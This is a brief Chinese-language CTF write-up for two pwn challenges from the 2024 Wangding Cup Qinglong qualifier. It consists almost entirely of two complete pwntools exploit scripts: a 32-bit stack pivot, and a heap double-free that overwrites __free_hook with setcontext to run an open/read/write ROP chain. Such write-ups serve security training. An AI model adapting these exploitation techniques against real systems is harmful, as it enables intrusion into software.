2024网鼎杯青龙组线上资格赛Pwn

青龙组不卷,只做了两道简单的,剩下的太阴间了

pwn2

32位栈迁移

md一开始没看到给了/bin/sh,自己写在栈上的打不通

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
from pwn import *
context(os='linux', arch='i386', log_level='debug')
context.terminal = ['tmux', 'sp', '-h']
local = 0
elf = ELF('./short')
if local:
p = process('./short')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
p = remote('0192d5f503467e5c9706966051c75907.tiud.dg10.ciihw.cn',43656)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

sd = lambda s : p.send(s)
sl = lambda s : p.sendline(s)
sa = lambda n,s : p.sendafter(n,s)
sla = lambda n,s : p.sendlineafter(n,s)
rc = lambda n : p.recv(n)
rl = lambda : p.recvline()
ru = lambda s : p.recvuntil(s)
ra = lambda : p.recvall()
ia = lambda : p.interactive()
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))

def lg(s):
success("%s >> 0x%x" % (s, eval(s)))

def bk(addr):
gdb.attach(p,"b *"+str(hex(addr)))

def debug(addr,PIE=False):
if PIE:
text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
gdb.attach(p,'b *{}'.format(hex(text_base+addr)))

else:
gdb.attach(p,"b *{}".format(hex(addr)))


gift = 0x80485E6
leave_ret = 0x08048555
ret = 0x080483fa
sla("Enter your username: ","admin")
sla("Enter your password: ","admin123")
#debug(0x8048675)
ru("You will input this: ")
add = int(rc(10),16)
lg("add")

payload = p32(0x80485FF) + p32(0x804A038)
payload = payload.ljust(0x50,b'\x00')
payload+= p32(add-4)+p32(leave_ret)
sa("plz input your msg:\n",payload)


ia()

pwn4

简单的堆orw,直接set_context

换2.35以上我早秒了QAQ

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ['tmux', 'sp', '-h']
local = 1
elf = ELF('./pwn')
if local:
p = process('./pwn')
libc = ELF('./libc.so.6')
else:
p = remote('0192d6496a03783395106845917ed538.gqlw.dg06.ciihw.cn',43668)
libc = ELF('./libc.so.6')

sd = lambda s : p.send(s)
sl = lambda s : p.sendline(s)
sa = lambda n,s : p.sendafter(n,s)
sla = lambda n,s : p.sendlineafter(n,s)
rc = lambda n : p.recv(n)
rl = lambda : p.recvline()
ru = lambda s : p.recvuntil(s)
ra = lambda : p.recvall()
ia = lambda : p.interactive()
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))

def lg(s):
success("%s >> 0x%x" % (s, eval(s)))

def bk(addr):
gdb.attach(p,"b *"+str(hex(addr)))

def debug(addr,PIE=True):
if PIE:
text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
else:
gdb.attach(p,"b *{}".format(hex(addr)))


def rc4(data):
key = b's4cur1ty_p4ssw0rd'
# 初始化状态向量
S = list(range(256))
j = 0

# KSA (Key Scheduling Algorithm)
for i in range(256):
j = (j + S[i] + key[i % len(key)]) % 256
S[i], S[j] = S[j], S[i] # 交换

# PRGA (Pseudo-Random Generation Algorithm)
i = j = 0
output = bytearray()

for byte in data:
i = (i + 1) % 256
j = (j + S[i]) % 256
S[i], S[j] = S[j], S[i] # 交换
K = S[(S[i] + S[j]) % 256]
output.append(byte ^ K) # XOR 操作

return output

def cmd(op):
sla("> ",str(op))

def add(index,size,content):
cmd(1)
sla("Input the key: ",str(index))
sla("Input the value size: ",str(size))
sla("Input the value: ",content)

def show(index):
cmd(2)
sla("Input the key: ",str(index))

def free(index):
cmd(3)
sla("Input the key: ",str(index))

def edit(index,content):
cmd(4)
sla("Input the key: ",str(index))
sla("Input the value: ",content)


sa("Input your username:",'4dm1n\n')
sa("Input your password:",'985da4f8cb37zkj\n')

for i in range(12):
add(i,0xf0,'a'*8)

for i in range(10):
free(9-i)

show(0)
ru("The result is:\n\t[key,value] = [0,")
libc_base = (uu64(rc(6)[-6:]) ^ 0xa4b3e366e833) - 0x3ebca0 # 2e50a4b3e366e833
lg('libc_base')

show(4)
ru("The result is:\n\t[key,value] = [4,")
heap_base = (uu64(rc(6)[-6:]) ^ 0xa4b3e366e833) - 0x1b70 # 2e50a4b3e366e833
lg('heap_base')

flag_addr = heap_base + 0x1b70
rop_addr = flag_addr + 16 + 0x100
pop_rbp = libc_base + next(libc.search(asm('pop rbp;ret;')))
leave_ret = libc_base + next(libc.search(asm('leave;ret;')))
ret = libc_base + next(libc.search(asm('ret;')))
pop_rdi = libc_base + next(libc.search(asm('pop rdi;ret;')))
pop_rsi = libc_base + next(libc.search(asm('pop rsi;ret;')))
pop_rdx = libc_base + next(libc.search(asm('pop rdx;ret;')))
pop_rax = libc_base + next(libc.search(asm('pop rax;ret;')))
syscall_ret = libc_base + next(libc.search(asm('syscall\nret')))
stdout_addr = libc_base + libc.sym['_IO_2_1_stdout_']
stderr_addr = libc_base + libc.sym['_IO_2_1_stderr_']
libc_write = libc_base + libc.sym['write']
libc_read = libc_base + libc.sym['read']
free_hook = libc_base + libc.sym['__free_hook']
set_context = libc_base + 0x52085


add(0,0xf0,'a'*8)
add(1,0xf0,'a'*8)
add(2,0xf0,'a'*8)

payload = b'./flag.txt\x00\x00\x00\x00\x00\x00'
payload+= p64(pop_rdi) + p64(flag_addr) + p64(pop_rsi) + p64(0) + p64(pop_rax) + p64(2) + p64(syscall_ret)
payload+= p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(flag_addr) + p64(pop_rdx) + p64(0x50) + p64(libc_read)
payload+= p64(pop_rdi) + p64(1) + p64(libc_write)
payload = payload.ljust(0xa0, b'a')
payload += p64(rop_addr)
payload += p64(ret)

add(11,0xf0,payload)


free(2)
free(1)
free(2)

edit(2,p64(free_hook^0x2e50a4b3e366e833))

add(0,0xf0,rc4(payload))
add(0,0xf0,p64(set_context^0x2e50a4b3e366e833))

free(11)

ia()